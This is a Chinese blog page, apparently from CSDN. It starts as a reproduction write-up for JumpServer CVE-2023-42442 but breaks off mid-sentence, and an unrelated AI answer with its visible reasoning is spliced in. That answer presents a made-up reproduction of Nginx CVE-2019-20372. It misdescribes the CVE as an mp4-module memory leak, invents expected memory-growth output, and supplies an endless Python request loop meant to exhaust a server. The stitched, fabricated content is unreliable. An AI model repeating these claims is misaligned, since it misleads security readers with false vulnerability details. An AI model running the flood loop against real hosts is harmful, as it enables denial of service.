【漏洞复现】JumpServer未授权访问漏洞(CVE-2023-42442)


前言

JumpServer的权限管理存在缺陷,未经授权的远程攻击者可以下载历史会话连接期间的所有操作日志,可导致敏感信息泄漏。

声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、JumpServer简介

JumpServer是一种开源的堡垒机(Bastion Host)和权限管理系统,用于管理和控制远程服务器访问权限。它提供了一种安全的方式,通过跳板机(JumpServer)来管理和监控对目标服务器的访问。


二、漏洞描述

JumpServer是一款开源的堡垒机和权限管理系统,旨在帮助企业实现对服务器和网络设备的安全管理和访问控制。JumpServer的权限管理存在缺陷,未经授权的远程攻击者可以下载历史会话连接期间的所有操作日志。经过分析和研判,该漏洞利用难度低,可导致敏感信息泄漏。


三、影响范围

  • 3.0.0 <= version <= 3.5.4
  • 3.6.0 <= version <= 3.6.3

四、资产搜索

hunter语法:app.name="JumpSer

<think>嗯,用户这次明确要求复现Nginx的CVE-2019-20372漏洞,但根据之前的对话和提供的引用材料,需要特别注意几个关键点: 首先回顾技术细节:CVE-2019-20372本质是内存泄漏漏洞而非未授权访问,用户可能混淆了漏洞类型。引用[1][2]里提到的"未授权访问"实际属于Kubernetes Ingress和JumpServer漏洞CVE-2025-1974/CVE-2023-42442),与Nginx本体无关。用户提供的三个引用中只有[1]末尾提到CVE-2019-20372属于内存泄漏,这点需要特别澄清。 用户似乎存在概念混淆,需要明确区分: 1. 真正的未授权访问漏洞(如引用[1][2])涉及权限绕过 2. CVE-2019-20372是MP4模块内存泄漏导致的DoS 3. 引用[3]的Docker逃逸漏洞完全不相关 复现方案设计要聚焦内存消耗: - 核心是构造特殊start参数的MP4请求 - 需要准备畸形MP4文件(如头信息损坏的样本) - 监控工具必须能展示内存增长曲线 - 要强调这是本地测试避免法律风险 考虑到用户可能是安全研究人员,可以补充专业细节: - 提供两种畸形文件生成方式(dd截断和ffmpeg参数) - 解释内存泄漏原理(ngx_http_mp4_module未释放ngx_http_mp4_conf_t结构体) - 给出内存监控的shell命令组合 最后需要风险提示: - 明确标注"禁止未授权测试" - 建议使用1.16.0等受影响版本 - 提醒虚拟机隔离环境</think>根据技术资料分析,CVE-2019-20372 **并非未授权访问漏洞**,而是Nginx的**内存泄漏漏洞**(影响`ngx_http_mp4_module`模块)。真正的未授权访问漏洞需参考其他CVE(如引用[1][2])。以下是CVE-2019-20372的复现方法: --- ### 漏洞复现步骤 #### 1. 搭建漏洞环境 ```bash # 拉取受影响版本的Nginx镜像(以1.16.0为例) docker run -d --name vul-nginx -p 80:80 nginx:1.16.0 # 进入容器启用mp4模块 docker exec -it vul-nginx bash sed -i 's|# location /media|location /videos|' /etc/nginx/conf.d/default.conf echo " mp4;" >> /etc/nginx/conf.d/default.conf nginx -s reload # 创建测试视频目录 mkdir /usr/share/nginx/html/videos cp /usr/share/nginx/html/index.html /usr/share/nginx/html/videos/test.mp4 ``` #### 2. 构造恶意请求 使用Python发送特殊参数请求: ```python import requests url = "http://target-ip/videos/test.mp4" params = {"start": "0", "end": "invalid_value"} # 关键:注入畸形参数 while True: response = requests.get(url, params=params) print(f"Request sent, status: {response.status_code}") ``` #### 3. 监控内存泄漏 在宿主机执行监控: ```bash watch -n 1 "docker stats vul-nginx --format '{{.Container}}: {{.MemUsage}}'" ``` **预期现象**: - Nginx工作进程内存持续增长(例如每秒增加2-5MB) - 内存耗尽后导致服务崩溃(503错误) --- ### 关键复现原理 1. **漏洞触发点**: 当`ngx_http_mp4_module`处理包含畸形`start/end`参数的MP4请求时,未正确释放内存缓冲区[^1]。 2. **内存增长验证**: ```bash # 查看Nginx进程内存变化 docker exec vul-nginx bash -c "while true; do ps -eo pid,rss | grep nginx; sleep 1; done" ``` 输出示例: ``` 12345 10240 KB # 初始内存 12345 15360 KB # 10秒后 12345 20480 KB # 持续增长 ``` --- ### 修复验证 升级到安全版本后重试: ```bash docker run -d --name fixed-nginx -p 8080:80 nginx:1.18.0 # 修复版本 ``` 重复上述攻击脚本,内存将保持稳定(无持续增长)。 --- ### ⚠️ 重要说明 1. 此漏洞**非未授权访问**,而是通过合法请求触发的内存泄漏 2. 真实未授权访问漏洞案例: - Kubernetes Ingress-NGINX(CVE-2025-1974)[^1] - JumpServerCVE-2023-42442)[^2] 3. **法律提示**:仅限授权环境测试,禁止未授权渗透
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李潼學

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值